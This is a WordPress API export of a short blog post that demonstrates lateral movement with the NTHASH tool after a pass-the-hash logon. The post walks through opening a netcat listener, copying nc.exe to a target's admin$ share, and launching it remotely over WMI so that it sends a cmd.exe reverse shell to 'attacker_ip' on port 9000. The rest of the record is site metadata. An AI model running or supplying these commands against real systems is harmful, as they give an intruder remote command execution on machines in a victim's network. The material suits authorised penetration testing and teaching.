{"id":2172,"date":"2019-10-28T21:40:42","date_gmt":"2019-10-28T20:40:42","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2172"},"modified":"2019-10-29T12:39:48","modified_gmt":"2019-10-29T11:39:48","slug":"demonstrating-pth-lateral-movement-with-nthash-part-2","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2172","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #2"},"content":{"rendered":"<p>In a previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2168\" target=\"_blank\" rel=\"noopener\">article<\/a>, we saw how to perform lateral movement through \u00ab\u00a0Pass The Hash\u00a0\u00bb.<\/p>\n<p>Let's imagine that there is no RDP server available on the target but you still need to get a shell on it.<\/p>\n<p>Let's use a reverse shell, i.e. the target will connect back to us (the attacker).<\/p>\n<p>This is also useful if the firewall on the target allows only outbound connections.<\/p>\n<p>1. Set up a netcat listener on the attacker host<br \/>\n<strong>nc -L -vv -p 9000<\/strong><\/p>\n<p>2. Copy the file to the target host (remember, you are using a PtH shell with proper logon details).<br \/>\n<strong>copy nc.exe \\\\target\\admin$<\/strong><\/p>\n<p>3. Execute netcat on the target host<br \/>\n<strong>NTHASH-win64.exe \/runwmi \/server:target \/binary:nc attacker_ip 9000 -e cmd.exe<\/strong><\/p>\n<p>At this point a shell will pop up in your listening netcat.<\/p>\n<p>Try a simple whoami for fun.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In a previous article, we saw how to perform lateral movement through \u00ab\u00a0Pass The Hash\u00a0\u00bb. Let's imagine that there is no RDP server available on the target but you still need to get a shell on it. Let's use a reverse shell, i.e. the target will connect back to us (the attacker). This <a href='https:\/\/labalec.fr\/erwan\/?p=2172' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2172","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2172"}],"version-history":[{"count":5,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172\/revisions"}],"predecessor-version":[{"id":2201,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172\/revisions\/2201"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}